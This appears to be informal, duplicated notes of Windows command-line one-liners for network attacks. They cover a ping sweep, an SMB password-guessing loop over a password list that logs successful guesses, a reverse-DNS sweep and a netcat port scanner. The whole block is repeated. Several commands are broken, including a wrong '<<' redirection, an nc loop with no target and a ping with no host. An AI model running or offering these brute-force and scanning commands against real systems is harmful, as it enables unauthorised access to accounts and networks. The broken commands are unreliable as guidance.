>> FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"
--> is a ping sweep
>> FOR /f %i in (password.lst) do @echo %i & @net use file://target_ip_addr/ %i /u:[username] 2>nul && pause
--> password guess; instead of pause, we could append our results to a file with :
&& echo Username: %i >> success.txt
>> FOR /L %i in (1,1,255) do echo %i & ping -n 5 & cls -->
[command1] & [command2] --> run multiple commands
[command1] && [command2] --> run multiple commands only if the prior command is succeeded without error
u could use the echo cmd to build a script line by line by running the following cmd several times, varying the line each time you run it
c:\ echo [line] << file.bat
The FOR loop variable must be changed from %[var] to %%[var] to make in a batch file. Place 2 %age sign infront of each vaiable name
windows>for /L %i in (1,1,255) do @echo 192.168.58.%i: & @nslookup 192.168.58.%i 2>nul | find "Name"
this cmd starts a FOR /L couting loop at 1, counts by 1, and proceed through 255, using %i as the variable. At ach iteration through the loop, it echoes the ip address that it is trying by a colon, w/o displaying the echo cmd (@echo 192.168.58.%i:). then it performs a reverse lookup of each ip address against server using lookup, again w/o displaying the nslookup cmd (@nslookup 192.168.58.%i if nslookup cant find a name it display a mesg of ***[server] cant find..... we want to get rid of that standard error so we redirect it to nul. we search the outupt of the cmd with the find command, looking for the string "Name" b/c sucssessfully searched names will include this string.
windows>for /L %i in (1,1,255) do @nslookup 192.168.58.%i 2>nul | find "Name" && echo 192.168.58.%i
will display to ip address when we succsssfully resolve a name, we could run.
windows>for /f %i in (ports.txt) do @nc.exe -n -vv -w3 %i
build a port scanner using ports.txt which simply contains the port numbers (one port number at a line). you could use following to develop the list.
windows> echo 21 >> ports.txt
windows> echo 22 >> ports.txt
windows> echo 23 >> ports.txt
--> is a ping sweep
>> FOR /f %i in (password.lst) do @echo %i & @net use file://target_ip_addr/ %i /u:[username] 2>nul && pause
--> password guess; instead of pause, we could append our results to a file with :
&& echo Username: %i >> success.txt
>> FOR /L %i in (1,1,255) do echo %i & ping -n 5 & cls -->
[command1] & [command2] --> run multiple commands
[command1] && [command2] --> run multiple commands only if the prior command is succeeded without error
u could use the echo cmd to build a script line by line by running the following cmd several times, varying the line each time you run it
c:\ echo [line] << file.bat
The FOR loop variable must be changed from %[var] to %%[var] to make in a batch file. Place 2 %age sign infront of each vaiable name
windows>for /L %i in (1,1,255) do @echo 192.168.58.%i: & @nslookup 192.168.58.%i 2>nul | find "Name"
this cmd starts a FOR /L couting loop at 1, counts by 1, and proceed through 255, using %i as the variable. At ach iteration through the loop, it echoes the ip address that it is trying by a colon, w/o displaying the echo cmd (@echo 192.168.58.%i:). then it performs a reverse lookup of each ip address against server using lookup, again w/o displaying the nslookup cmd (@nslookup 192.168.58.%i if nslookup cant find a name it display a mesg of ***[server] cant find..... we want to get rid of that standard error so we redirect it to nul. we search the outupt of the cmd with the find command, looking for the string "Name" b/c sucssessfully searched names will include this string.
windows>for /L %i in (1,1,255) do @nslookup 192.168.58.%i 2>nul | find "Name" && echo 192.168.58.%i
will display to ip address when we succsssfully resolve a name, we could run.
windows>for /f %i in (ports.txt) do @nc.exe -n -vv -w3 %i
build a port scanner using ports.txt which simply contains the port numbers (one port number at a line). you could use following to develop the list.
windows> echo 21 >> ports.txt
windows> echo 22 >> ports.txt
windows> echo 23 >> ports.txt
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